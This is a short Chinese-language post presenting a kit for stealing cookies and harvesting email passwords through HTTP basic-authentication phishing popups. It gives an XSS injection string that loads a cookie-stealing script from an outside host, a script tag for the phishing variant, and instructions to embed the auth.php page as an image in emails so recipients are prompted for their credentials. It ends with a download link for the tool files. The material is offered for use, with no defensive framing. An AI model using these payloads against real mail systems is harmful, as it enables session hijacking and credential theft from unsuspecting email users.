大家回想一下,在接收到一个邮件打开的时候是不是会弹出这样的一个弹窗让你输入帐号密码登录呢?没错,这就是最近很火的基础认证。
首先做一个测试,先上传测试程序到一个支持PHP的空间里,测试程序由以下几个文件构成:
需要修改1.js f.js x.php auth.php中参数。
比如:
好了,接下来是两种用法:
窃取cookies实例
</textarea>'”><script src=”http://weizn.net/1.js”></script>
基础认证钓鱼利用示例:
<script src=”http://weizn.net/f.js”></script>
在任何可插入图片的地方引用http://weizn.net/auth.php
打开接收的邮件后就会弹出验证框了。
下载地址:http://dl.vmall.com/c0hywg2gh3